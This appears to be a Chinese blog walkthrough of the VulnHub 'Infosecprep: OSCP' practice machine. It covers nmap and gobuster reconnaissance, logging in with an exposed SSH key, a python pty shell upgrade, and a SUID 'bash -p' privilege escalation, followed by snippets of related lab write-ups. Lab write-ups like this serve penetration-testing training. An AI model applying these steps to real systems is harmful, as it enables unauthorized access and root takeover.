<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    VulnHub靶機 | Infosecprep:oscp

    VSole2022-08-11 11:22:05

    "滿地都是六便士,他卻抬頭看見了月亮"


    項目地址:
    https://download.vulnhub.com/infosecprep/oscp.zip
    本靶機比較適合新手
    

    0x00.主機探測

    sudo nmap -sP 192.168.33.1/24
    

    確定目標IP為:192.168.33.131

    0x01.端口服務探測:

    sudo nmap -sC -sV 192.168.33.131 -oN oscp.nmap
    

    0x02.訪問80端口:

    一個很經典的WordPress頁面當然最重要的信息是only user for the box is “oscp”
    這里有兩種可能:1.指wordpress后臺賬戶只有oscp,2.是這臺靶機系統上只有ROOT和OSCP這兩個用戶
    

    是一個 WordPress 的 cms ,
    #看下是什么版本的cmseek -u http://192.168.33.131
    

    0x03.目錄遍歷:

    sudo gobuster dir -u http://192.168.33.131 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium
    

    http://192.168.33.131/secret.tx
    


    Base64解密:發現是SSH密鑰

    0x04.直接SSH鏈接:

    ssh -i id_rsa oscp@192.168.33.131
    

    0x05.提權:先拿一個完整的shell

    python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm ctrl + z stty -a stty raw -echo;fg reset stty rows x columns y
    

    這個靶機不能使用這個,提權要用到現在通過 python 拿一個完整的 shell 就不行了.

    guid =s 提權

    find / -perm -u=s -type f 2>/dev/null
    

    /usr/bin/bash -p whoami
    

    0x06.提權成功:

    sshnmap
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    2在一次滲透測試中拿到一個ip地址52.80.249.xx,nmap端口掃描出22,6379,80端口,目標機是linux系統的一臺服務器,6379為redis的默認端口,嘗試對其進行利用。
    SSH 是一種廣泛使用的協議,用于安全地訪問 Linux 服務器。但是,不安全的默認配置也會帶來各種安全風險。具有開放 SSH 訪問權限的服務器的 root 帳戶可能存在風險。因此,有必要了解 SSH 安全性。這是在 Linux 上保護 SSH 服務器連接的方法。關閉 root 用戶的服務器訪問是一種防御策略,可以防止攻擊者實現入侵系統的目標。例如,您可以創建一個名為exampleroot的用戶,如下所示:useradd?
    使用nmap+vulscan+nmap-vulner+python腳本,基于軟件版本進行掃描并編寫python腳本將xml文檔解析為excel格式輸出
    若讀者因此作出任何危害網絡安全行為后果自負,與本號及原作者無關。接下來就是成功使用ssh連接。useradd新建賬號edu,然后把新建的賬戶加入管理員組。具體操作可以參考:https://blog.csdn.net/llm_hao/article/details/118031154使用新賬號edu進行登錄,發現為root權限,成功!重新再使用firefart賬戶登錄,發現已經無法登錄了。到從旁站上傳木馬,獲取網站服務器權限,權限較低,使用臟牛提權,到后面的恢復原本的賬戶,并新建一個管理員。
    DerpnStink靶場
    2023-01-12 11:40:41
    DerpnStink信息收集使用nmap進行深度掃描,發現開放了21和22端口,以及80端口,80端口為wordpress應用,存在wordpress登陸apiNmap scan report for 10.0.3.4
    nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target. nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target. NetCat,它的實際可運行的名字叫nc,應該早很就被提供,就象另一個沒有公開但是標準的Unix工具。
    在這篇文章詳細記錄了他打“HackTheBox-BountyHunter”靶場的整個過程,希望大家能夠從中有所收獲!
    hackthebox Oz靶機滲透
    2022-05-18 08:30:25
    我們可以看到80、8080有一個werkzeug,查了一下是一個WSGI的工具包。
    靶機Agile補充圖片
    2023-03-22 10:04:15
    Nmap done: 1 IP address scanned in 171.68 seconds. 添加host└─# echo "10.10.11.203 superpass.htb" >> /etc/hosts. 注冊個賬號就讀取了。我們可以在 python 中創建一個腳本,自動實現這個過程,只需要輸入的文件路徑└─# cat lfi.py. data = {"username": "123", "password": "123", "submit": ""}
    HackTheBox-Knife靶場實戰
    2021-09-24 09:07:11
    當服務器存在該后門時,攻擊者可以通過發送User-Agentt頭來執行任意代碼。這邊我們直接抓包并發送到重發器試試命令執行的結果User-Agentt: zerodiumsystem;所以,針對一個需要被很多user以root權限執行的文件, 我們可以通過setuid來進行操作, 這樣就不必為所有user都添加sudo 命令。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类